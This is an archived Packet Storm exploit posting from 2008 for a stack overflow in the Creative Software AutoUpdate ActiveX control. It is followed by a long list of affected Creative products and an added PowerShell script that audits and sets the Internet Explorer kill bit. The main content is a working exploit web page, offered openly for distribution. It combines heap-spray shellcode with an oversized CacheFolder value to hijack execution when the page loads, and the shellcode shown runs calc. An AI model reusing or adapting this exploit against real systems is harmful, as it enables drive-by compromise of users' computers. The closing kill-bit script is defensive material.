
creative-overflow.txt

Date: 29 May 2008
Reported by: BitKrush
Type: packetstorm
Source: packetstormsecurity.com

Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow Exploit

Code
`<html>  
<!--  
!!!NOT PRIVATE PLEASE DISTRIBUTE!!!  
Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit by BitKrush <BitKrush +A.T.+ G.M.A.I.L.D.0.T.C.0.M.>  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably.  
Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security  
ActiveX Download @ http://www.creative.com/su/Product.asp  
MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION  
Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS!  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Tested On Windows XP SP3 with all patches (like that matters)  
Products Affected:  
the below Creative Labs Software and Hardware depends on this ActiveX for updates and comes shipped with it or is supported by the control:  
Sound cards  
Audigy  
Audigy 2  
Audigy 2 LS  
Audigy 2 NX  
Audigy 2 Platinum  
Audigy 2 Platinum eX  
Audigy 2 Value  
Audigy 2 ZS  
Audigy 2 ZS Gamer  
Audigy 2 ZS Notebook  
Audigy 2 ZS Platinum  
Audigy 2 ZS Platinum Pro  
Audigy 2 ZS Video Editor  
Audigy 4 Pro  
Audigy Gamer  
Audigy LS  
Audigy MP3+  
Audigy Platinum  
Audigy Platinum eX  
Live! 24-bit  
Live! 24-bit External  
Live! 5.1  
Live! 5.1 Digital (Dell)  
Live! ADVANCED MB  
MP3 +  
Sound Blaster Audigy 2 ZS Digital Audio  
Sound Blaster Audigy ADVANCED MB  
Sound Blaster X-Fi Fatal1ty  
Wireless Music  
X-Fi Elite Pro  
X-Fi Platinum  
X-Fi XtremeMusic  
  
USB Sound Blaster  
Audigy 2 NX  
MP3 +  
  
Portable Audio  
MuVo  
MuVo NX  
MuVo Slim  
MuVo TX  
MuVo TX FM  
MuVo² X-Trainer  
MuVo²  
MuVo² FM  
NOMAD II 32MB  
NOMAD II MG  
NOMAD IIc  
NOMAD Jukebox 3  
NOMAD Jukebox ZEN  
Rhomba  
  
Portable Media Players  
ZEN Portable Media Center  
ZEN Vision 30GB  
  
MP3 Players  
MuVo  
MuVo 2.0 / MuVo Mix  
MuVo Micro  
MuVo NX  
MuVo Slim  
MuVo Sport C100  
MuVo TX  
MuVo TX FM  
MuVo V200  
MuVo² X-Trainer  
MuVo²  
MuVo² FM  
NOMAD II 32MB  
NOMAD II MG  
NOMAD II MG Limited Edition  
NOMAD IIc  
NOMAD JukeBox  
NOMAD Jukebox 10GB  
NOMAD Jukebox 2  
NOMAD Jukebox 3  
NOMAD Jukebox C  
NOMAD Jukebox ZEN  
NOMAD Jukebox ZEN NX  
NOMAD Jukebox ZEN USB 2.0  
Rhomba  
ZEN 20GB  
ZEN Micro  
ZEN Nano 512MB  
ZEN Nano Plus  
ZEN Neeon 5GB/6GB  
ZEN Portable Media Center  
ZEN Sleek  
ZEN Touch  
ZEN Vision 30GB  
ZEN Xtra  
  
Web Cameras  
Creative PC-CAM 900  
Creative WebCam Vista  
Game Star  
Live! Ultra for Notebooks  
PC-CAM 880  
WebCam Instant  
WebCam Instant  
WebCam Live!  
WebCam Live! Pro  
WebCam Live! Ultra  
WebCam Notebook  
WebCam NX  
WebCam NX Pro  
WebCam NX Ultra  
WebCam Vista  
  
Video  
Audigy 2 ZS Video Editor  
  
Wireless  
Wireless Music  
  
Notebook Products  
Audigy 2 NX  
Audigy 2 ZS Notebook  
Live! 24-bit External  
Live! Ultra for Notebooks  
MP3 +  
WebCam Notebook  
  
Software  
Game Star  
http://us.creative.com/support/downloads/popup_supportproducts.asp  
Google: http://www.google.com/search?q=0A5FD7C5-A45C-49FC-ADB5-9952547D5715&btnG=Search  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
ActiveX CLSID = 0A5FD7C5-A45C-49FC-ADB5-9952547D5715  
KILL BIT THIS ^^  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
-->  
  
<object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object>  
<script language='javascript'>  
var sc01 = unescape("%u9090%u9090"+ //Windows Execute Command (calc)  
"%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+  
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+  
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+  
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+  
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+  
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+  
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c");  
var mainblk = unescape("%u0c0c%u0c0c");  
var hdr = 20;  
var slck = hdr + sc01.length;  
while (mainblk.length < slck) mainblk += mainblk;  
var fillblk = mainblk.substring(0,slck);  
var blk = mainblk.substring(0,mainblk.length - slck);  
while (blk.length + slck < 0x40000) blk = blk + blk + fillblk;  
var memory = new Array();  
for (i = 0; i < 400; i++){ memory[i] = blk + sc01 }  
var buf = '';  
while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here.  
obj1.cachefolder = buf;  
</script>  
</html>  
`
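
Mitigation

The header comment's own mitigation ("KILL BIT THIS") as an added defensive example; it is not part of the original posting or of any Creative or Microsoft tooling. It reports whether the kill bit (`Compatibility Flags` value `0x400`) is set for the CLSID quoted above in both registry views and sets it only when run with `-Apply`, which is this script's own switch.

```powershell
# Added example: audit (and with -Apply, set) the Internet Explorer kill bit
# for the CLSID given in the posting above. Run from an elevated prompt.
# -Apply is this script's own switch, not a Windows or vendor option.
param([switch]$Apply)

$Clsid     = '{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}'  # from the posting
$KillBit   = 0x400                                      # "do not load in IE" flag
$ValueName = 'Compatibility Flags'
$Suffix    = 'Microsoft\Internet Explorer\ActiveX Compatibility'

# 32-bit IE on 64-bit Windows reads the WOW6432Node view, so cover both.
$Roots = @("HKLM:\SOFTWARE\$Suffix")
if (Test-Path 'HKLM:\SOFTWARE\WOW6432Node') {
    $Roots += "HKLM:\SOFTWARE\WOW6432Node\$Suffix"
}

# Is the control registered on this machine at all (either view)?
$Registered = [bool](@("CLSID\$Clsid", "WOW6432Node\CLSID\$Clsid") |
    Where-Object { Test-Path -LiteralPath "Registry::HKEY_CLASSES_ROOT\$_" })

foreach ($Root in $Roots) {
    $Key   = Join-Path $Root $Clsid
    $Flags = 0
    if (Test-Path -LiteralPath $Key) {
        $Prop = Get-ItemProperty -LiteralPath $Key -Name $ValueName -ErrorAction SilentlyContinue
        if ($Prop) { $Flags = $Prop.$ValueName }
    }
    $Blocked = ($Flags -band $KillBit) -ne 0

    if (-not $Blocked -and $Apply) {
        if (-not (Test-Path -LiteralPath $Key)) { New-Item -Path $Key -Force | Out-Null }
        # OR the bit in so any other compatibility flags already present survive.
        New-ItemProperty -LiteralPath $Key -Name $ValueName -PropertyType DWord `
            -Value ($Flags -bor $KillBit) -Force | Out-Null
        $Blocked = $true
    }

    # One result row per registry view.
    [pscustomobject]@{
        Key               = $Key
        ControlRegistered = $Registered
        Flags             = '0x{0:X8}' -f $Flags
        KillBitSet        = $Blocked
    }
}
```

The kill bit only stops Internet Explorer from instantiating the control; it does not remove or patch the control itself.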
